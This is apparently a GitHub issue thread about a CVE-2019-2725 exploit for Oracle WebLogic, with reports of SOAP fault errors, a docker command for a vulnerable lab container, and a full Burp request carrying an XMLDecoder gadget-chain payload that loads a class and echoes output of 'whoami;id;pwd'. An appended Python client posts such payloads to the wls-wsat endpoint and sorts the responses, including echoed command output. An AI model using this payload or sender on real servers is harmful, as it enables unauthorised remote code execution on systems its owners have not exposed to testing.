lufeirider / CVE-2019-2725

CVE-2019-2725 command output echo


java.io.IOException javax.xml.stream.XMLStreamException: Error at line:0 col:0 Line:32 A '"'

hktalent opened this issue · comments

commented

Using
https://raw.githubusercontent.com/lufeirider/CVE-2019-2725/master/weblogic-2019-2725_12.1.3命令执行.txt
gives this error:

<env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/"><env:Header/><env:Body><env:Fault><faultcode>env:Client</faultcode><faultstring>Unable to parse the incoming request</faultstring><detail><java:string xmlns:java="java.io">java.io.IOException
javax.xml.stream.XMLStreamException: Error at line:0 col:0 Line:32 A '"' was expected,  this attribute was not terminated by a matching double quote
Error at line:0 col:0 Line:32 A '"' was expected,  this attribute was not terminated by a matching double quote
</java:string></detail></env:Fault></env:Body></env:Envelope>
commented

Using https://raw.githubusercontent.com/lufeirider/CVE-2019-2725/master/weblogic-2019-2725-12.1.3回显检测.txt
gives this error:

<env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/"><env:Header/><env:Body><env:Fault><faultcode>env:Server</faultcode><faultstring></faultstring><detail><java:string xmlns:java="java.io">java.lang.NullPointerException&#xA;</java:string></detail></env:Fault></env:Body></env:Envelope>

You should use weblogic12:

docker pull ismaleiva90/weblogic12
Using default tag: latest
latest: Pulling from ismaleiva90/weblogic12
a3ed95caeb02: Pull complete 
b82337cd1027: Pull complete 
9e3715b1d6be: Pull complete 
3247d9683c11: Pull complete 
b8c01449cf4a: Pull complete 
91c32b48ce3b: Pull complete 
c617a682e3f2: Pull complete 
83083f09438c: Pull complete 
fe83b45f7a9f: Pull complete 
db497d879495: Pull complete 
2a44b564a6af: Pull complete 
cf65f5fbc4e9: Pull complete 
37170691a3c4: Pull complete 
59fd638f77cf: Pull complete 
c0a9d25582e2: Pull complete 
816614cf1ec2: Pull complete 
5cf15f6bb208: Pull complete 
eebf27ebdf8a: Pull complete 
5d3a0c287a13: Pull complete 
fec10779fa63: Pull complete 
Digest: sha256:12d2cb79c438277e4c775d36cbe07cf1b54b201641f9efdd937a174be72a6f48
Status: Downloaded newer image for ismaleiva90/weblogic12:latest

docker run -d -p 6661:7001 -p 6662:7002 -p 6663:5556 ismaleiva90/weblogic12:latest


Burp Suite request (whoami;id;pwd):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 10.10.20.100:6661
Content-Length: 4414
Accept-Encoding: gzip, deflate
Accept: */*
content-type: text/xml


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
<java>
<class><string>org.slf4j.ext.EventData</string>
<void>
<string>
		<java>
			<void class="sun.misc.BASE64Decoder">
				<void method="decodeBuffer" id="byte_arr">	<string>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</string>
				</void>
			</void>
			<void class="org.mozilla.classfile.DefiningClassLoader">
				<void method="defineClass">
					<string>ResultBaseExec</string>
					<object idref="byte_arr"></object>
					<void method="newInstance">
						<void method="do_exec" id="result">
							<string>whoami;id;pwd</string>
						</void>
					</void>
				</void>
			</void>

			<void class="java.lang.Thread" method="currentThread">
				<void method="getCurrentWork" id="current_work">
					<void method="getClass">
						<void method="getDeclaredField">
							<string>connectionHandler</string>
								<void method="setAccessible"><boolean>true</boolean></void>
							<void method="get">
								<object idref="current_work"></object>
								<void method="getServletRequest">
									<void method="getResponse">
										<void method="getServletOutputStream">
											<void method="writeStream">
												<object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object>
												</void>
											<void method="flush"/>
											</void>
									<void method="getWriter"><void method="write"><string></string></void></void>
									</void>
								</void>
							</void>
						</void>
					</void>
				</void>
			</void>
		</java>
</string>
</void>
</class>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
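Added example, not code from the lufeirider repository or from either commenter: a small Python client that does the two checks a tester wants before and after sending one of the payload files above. It parses the payload locally first, because the "Unable to parse the incoming request" fault in the first report is WebLogic's generic answer to malformed XML (the XMLStreamException names an unterminated attribute value on line 32 of the payload), then POSTs to /wls-wsat/CoordinatorPortType with the same headers as the Burp request and sorts the answer into a client-side parse fault, a server fault such as the NullPointerException in the second report, or echoed command output. Assumptions: the payload is read from a file the user supplies, a response body without a SOAP Fault is treated as the echoed output, and ECHO_BODY and BAD_PAYLOAD are constructed samples; the two fault bodies are copied from the reports above.

```python
import sys
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

# Endpoint from the Burp request above; the port comes from the docker run line.
WSAT_PATH = "/wls-wsat/CoordinatorPortType"
SOAP_NS = "{http://schemas.xmlsoap.org/soap/envelope/}"


def check_payload(xml_text):
    """Parse the payload locally before sending it.

    Returns (True, "ok") or (False, "line L col C: reason"). WebLogic only
    answers 'Unable to parse the incoming request', so a local parse is the
    quickest way to locate a defect such as the unterminated attribute value
    in the first report.
    """
    try:
        ET.fromstring(xml_text)
    except ET.ParseError as exc:
        line, col = exc.position
        return False, f"line {line} col {col}: {exc}"
    return True, "ok"


def classify_response(body):
    """Sort a response from the wls-wsat endpoint into one of four kinds.

    'parse_error'  env:Client fault, request XML rejected (first report)
    'server_fault' env:Server fault carrying a Java exception (second report)
    'echo'         no SOAP Fault; the body is treated as the command output
                   the gadget chain wrote to the servlet output stream
    'unknown'      any other fault
    Returns (kind, text): text is the fault detail, or the raw body for 'echo'.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "echo", body
    fault = root.find(f".//{SOAP_NS}Fault")
    if fault is None:
        return "echo", body
    code = (fault.findtext("faultcode") or "").strip()
    faultstring = fault.findtext("faultstring") or ""
    detail = fault.find("detail")
    text = "".join(detail.itertext()).strip() if detail is not None else faultstring
    if "Unable to parse the incoming request" in faultstring or "XMLStreamException" in text:
        return "parse_error", text
    if code.endswith("Server"):
        return "server_fault", text
    return "unknown", text


def send_payload(base_url, payload, timeout=10):
    """POST the payload with the same headers as the Burp request above."""
    req = urllib.request.Request(
        base_url.rstrip("/") + WSAT_PATH,
        data=payload.encode("utf-8"),
        headers={"Content-Type": "text/xml", "Accept": "*/*"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        # SOAP faults come back with an error status; the body is still useful.
        return exc.code, exc.read().decode("utf-8", "replace")


# Sample inputs: the two fault bodies are copied from the reports above; the
# echo body and the broken payload are constructed for this example.
FAULT_PARSE = """<env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/"><env:Header/><env:Body><env:Fault><faultcode>env:Client</faultcode><faultstring>Unable to parse the incoming request</faultstring><detail><java:string xmlns:java="java.io">java.io.IOException
javax.xml.stream.XMLStreamException: Error at line:0 col:0 Line:32 A '"' was expected,  this attribute was not terminated by a matching double quote
</java:string></detail></env:Fault></env:Body></env:Envelope>"""
FAULT_NPE = """<env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/"><env:Header/><env:Body><env:Fault><faultcode>env:Server</faultcode><faultstring></faultstring><detail><java:string xmlns:java="java.io">java.lang.NullPointerException&#xA;</java:string></detail></env:Fault></env:Body></env:Envelope>"""
ECHO_BODY = "oracle\nuid=1000(oracle) gid=1000(oracle) groups=1000(oracle)\n/u01/oracle\n"
BAD_PAYLOAD = '<java>\n<void method="flush>\n</void>\n</java>\n'  # unterminated attribute value


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: send_wsat.py http://10.10.20.100:6661 payload.xml")
    base_url, path = sys.argv[1], sys.argv[2]
    with open(path, encoding="utf-8") as fh:
        payload = fh.read()
    ok, msg = check_payload(payload)
    if not ok:
        sys.exit(f"payload is not well-formed XML, fix it before sending: {msg}")
    status, body = send_payload(base_url, payload)
    kind, text = classify_response(body)
    print(f"HTTP {status}: {kind}\n{text}")
```

Run it as python3 send_wsat.py http://10.10.20.100:6661 payload.xml against the weblogic12 container, where payload.xml is one of the repository's txt files with the base64 class bytes filled in; a payload that does not parse locally is refused, with the line and column of the defect printed instead of the server's generic fault.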